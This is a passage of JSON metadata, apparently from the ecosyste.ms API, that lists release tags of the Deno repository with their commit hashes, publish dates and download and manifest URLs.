GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url